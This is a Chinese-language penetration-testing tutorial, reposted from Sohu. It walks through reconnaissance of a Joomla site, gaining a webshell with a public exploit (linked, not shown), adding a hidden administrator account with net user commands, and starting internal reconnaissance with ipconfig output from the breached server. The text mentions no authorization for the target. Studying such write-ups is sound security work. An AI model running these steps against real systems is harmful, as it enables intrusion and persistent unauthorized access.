渗透测试实战-安全

捐助

渗透测试实战

2504 次浏览

2019-8-19

编辑推荐:

本文来自于sohu，文章主要从渗透测试的第一步信息刺探到内网渗透等，详细介绍了一个相对完整的渗透实战，希望对您能有所帮助。

在看白帽子们的漏洞的时候总有一种感觉就是把web渗透简单地理解成了发现web系统漏洞进而获取webshell。其实，个人感觉一个完整的渗透（从黑客的角度去思考问题）应该是以尽一切可能获取目标的系统或者服务器的最高权限，尽可能的发现足够多的敏感信息。这个过程应该包括但不限于以下几个方面：

信息刺探：待渗透目标的系统，人员，组织信息等。

漏洞侦测：所有与待渗透目标相关的系统的漏洞侦测。

系统提权：利用现有的信息对已经获取的系统进行提权从而获取最高控制权限。

内网渗透：利用以获取的系统作为跳板进一步扩大战果，重复以上三步获取更多的系统权限和内网敏感信息。

一、信息刺探

作为渗透测试的第一步，也是最重要地一步便是信息刺探。孙子兵法有云：“知己知彼，百战不殆”。

首先是选择实战的目标站点，搜集到的信息如下：

从以上搜集到的信息，我们可以简单的分析一下接下来的渗透思路：

查找主站漏洞并利用

利用子站漏洞旁注进入系统搜集更多有用信息

二、漏洞侦测

按照上面的思路首先尝试寻找主站的漏洞，通常可通过AWVS或者其他的扫描工具做初步的扫描，看看会不会有可以利用的点。但是最简单直接的方法是打开这个站点，尽可能仔细的浏览每一可能有价值的页面，如下：

有没有发现，其实我们可以观察到一些很有价值的信息。从上面的信息，我们可以发现这个主站是基于Joomla CMS的，这个其实对我们接下来的渗透很有帮助，我们都知道最近爆出了Joomla的RCE和SQL注入漏洞，那么我们就可以去尝试看看这个站是否修复了这些漏洞。

于是，我们可以使用已经公开的exp(http://avfisher.win/archives/287)对其进行测试，如下所示：

果然漏洞确实存在，而且我们也顺利地getshell了，那么是不是意味着我们的渗透已经结束了呢？no，no，no（重要的事情说3遍），其实真正的渗透才刚刚开始。

三、系统提权

我们发现这是一个Windows 2008 R2的服务器，既然我们已经拿到了webshell，接下来考虑的事情就应该是，我能不能获得管理员权限？

首先，在菜刀中执行命令： whoami 看看现在的shell是在什么权限下运行的，如下：

可以看出我们的shell是在system权限下运行的，那么也就表示我们可以很容易的添加一个管理员帐户，命令如下：

net user administer <password>/addnet localgroup administrators administer /add

四、内网渗透

接下来，我们就需要经一步查看和收集系统的一些常见信息来帮助我们进一步的内网渗透，通常包括以下信息：

1. 系统信息 – systeminfo

2. IP信息 – ipconfig /all

WindowsIP 配置主机名 . . . . . . . . . . . . . : EESTSWEB01 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft虚拟机总线网络适配器物理地址. . . . . . . . . . . . . : 00-15-5D-00-02-01DHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是本地链接 IPv6地址. . . . . . . . : fe80::98f7:e8a:3eeb:ff6%11(首选) IPv4地址 . . . . . . . . . . . . : 192.168.0.10(首选) 子网掩码 . . . . . . . . . . . . : 255.255.255.0默认网关. . . . . . . . . . . . . : 192.168.0.230DHCPv6IAID . . . . . . . . . . . : 234886493DHCPv6客户端 DUID . . . . . . . : 00-01-00-01-1C-E6-6D-9C-00-15-5D-00-02-01DNS 服务器 . . . . . . . . . . . : 192.168.0.1TCPIP 上的 NetBIOS. . . . . . . : 已启用隧道适配器 isatap.{ADD2E201-9C5D-480F-8E29-F722627ABA6E}: 媒体状态 . . . . . . . . . . . . : 媒体已断开连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : MicrosoftISATAP Adapter物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是隧道适配器 TeredoTunnelingPseudo-Interface: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : MicrosoftTeredoTunnelingAdapter物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是 IPv6地址 . . . . . . . . . . . . : 2001:0:7834:496d:18cf:134e:3f57:fff5(首选) 本地链接 IPv6地址. . . . . . . . : fe80::18cf:134e:3f57:fff5%18(首选) 默认网关. . . . . . . . . . . . . : :: TCPIP 上的 NetBIOS. . . . . . . : 已禁用

3. 开放的端口信息 – netstat -an